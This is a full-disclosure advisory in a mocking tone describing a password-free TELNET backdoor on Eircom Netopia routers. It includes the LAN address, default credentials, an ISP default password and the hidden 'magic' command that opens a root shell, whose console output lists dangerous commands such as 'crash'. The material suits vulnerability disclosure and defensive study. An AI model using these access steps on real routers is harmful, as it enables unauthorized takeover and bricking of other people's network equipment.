Eircom Netopia Router Backdoor

`++++++++++++++++++++  
  
FULL DISCLOSURE OF EIRCOM NETOPIA ROUTER BACKDOOR VULNERABILITY!  
Yes, failcom suck, and they did it again. DERP!  
  
They gave us a nice TELNET shell into their routers, and now we can  
mess about 'cos it spawns a root shell by magic! (and magic is the  
actual command!)  
  
They also left a lovely web interface with supposed remote access  
capability, but i have to test that fully.  
  
Thanks to this, evil people could be hiding "in your switches  
rerouting your riches!'  
  
Disclosed by: Netcat, Hex, Chess.  
  
++++++++++++++++++++  
  
Netopia SOC OS version 7.8.0 has a simple TELNET backdoor.  
  
If a malicious attacker is on the local area network of a Netopia  
router, and they TELNET to 192.168.1.254 they are greeted with the  
following prompt... There is no password needed!  
  
++++++++++++++++++++  
  
Terminal shell v1.0  
Copyright ©2008 Motorola, Inc. All rights reserved.  
Netopia Model 2247-02 High-Power Wireless DSL Ethernet Managed  
Switch  
Running Netopia SOC OS version 7.8.0 (build r2)  
Multimode ADSL Capable  
(Admin completed login: Full Read/Write access)  
  
Netopia-2000/146306722576>  
  
  
++++++++++++++++++++  
  
If it does ask for a passphrase, we found admin/admin and  
admin/password worked every time in the wild.  
  
At the 'Admin shell' a help command gives you the following menu...  
  
  
++++++++++++++++++++  
  
Netopia-2000/146306722576> help  
arp to send ARP request  
atmping to send ATM OAM loopback  
clear to erase all stored configuration  
information  
clear_certificate to clear stored SSL certificate  
clear_log to clear stored log data  
configure to configure unit's options  
diagnose to run self-test  
download to download config file  
exit to quit this shell  
help to get more: "help all" or "help help"  
hotspot to set or show hotspot authentication  
info  
install to download and program an image into  
flash  
license to enter an upgrade key to add a  
feature  
log to add a message to the diagnostic log  
loglevel to report or change diagnostic log  
level  
netstat to show IP information  
nslookup to send DNS query for host  
ping to send ICMP Echo request  
quit to quit this shell  
reset to reset subsystems  
restart to restart unit  
show to show system information  
start to start subsystem  
status to show basic status of unit  
telnet to telnet to a remote host  
traceroute to send traceroute probes  
upload to upload config file  
view to view configuration summary  
wan_type to Set WAN interface type  
who to show who is using the shell  
? to get help: "help all" or "help help"  
wps to issue Wireless Protected Setup  
commands  
  
Netopia-2000/146306722576>  
  
++++++++++++++++++++  
  
However, typing the command 'magic' (not listed) brings up a new  
shell...  
  
++++++++++++++++++++  
  
Netopia-2000/146306722576> magic  
(poof!)  
  
Netopia-2000/146306722576# help  
arp to send ARP request  
atmping to send ATM OAM loopback  
brcm to read/write broadcom switch  
clear to erase all stored configuration  
information  
clear_certificate to clear stored SSL certificate  
clear_log to clear stored log data  
configure to configure unit's options  
diagnose to run self-test  
download to download config file  
exit to quit this shell  
help to get more: "help all" or "help help"  
hotspot to set or show hotspot authentication  
info  
install to download and program an image into  
flash  
loopback to set the interface in loopback mode  
license to enter an upgrade key to add a  
feature  
log to add a message to the diagnostic log  
loglevel to report or change diagnostic log  
level  
netstat to show IP information  
nslookup to send DNS query for host  
ping to send ICMP Echo request  
quit to quit this shell  
reset to reset subsystems  
restart to restart unit  
rma_count to perform RMA functions  
show to show system information  
sslclient to send HTTPS request to the Server.  
Default Port is 433  
start to start subsystem  
status to show basic status of unit  
telnet to telnet to a remote host  
traceroute to send traceroute probes  
upload to upload config file  
view to view configuration summary  
wan_type to Set WAN interface type  
ata to issue commands related to remote  
ATA configuration  
who to show who is using the shell  
access_code to show if access code is valid  
bootflags to show or set the bootflags  
checksum to calculate and display the cksums  
console to make this session the console  
mem to display or edit system memory  
trace to toggle routing tracing  
crash to cause system death  
adsldebug to debug commands  
dsm to DSM commands  
set_language to set web display language  
peer-address to print IP address of this shell user  
? to get help: "help all" or "help help"  
wps to issue Wireless Protected Setup  
commands  
  
Netopia-2000/146306722576#  
  
+++++++++++++++++++++++  
  
The 'Crash' command literally bricks the router. This shell is the  
root shell.  
It gets even worse though... It hasa lovely web  
interface if you open that web address in a browser!  
  
+++++++++++++++++++++++  
  
A malicious attacker on the LAN can do all kinds of things...  
  
+++++++++++++++++++++++  
  
ALL ROUTERS ISSUED BY EIRCOM THAT WE HAVE SEEN THUS FAR ARE  
VULNERABLE.  
THIS IS JUST AS BAD AS THEIR 'PREDICTABLE WEP KEY GENERATION  
ALGORITHM.  
  
Not to mention, Eircoms default login is always:  
[email protected]  
broadband1  
  
+++++++++++++++++++++++  
  
Thanks for reading!  
  
soon to come... can we overflow bit torrent buffers?  
`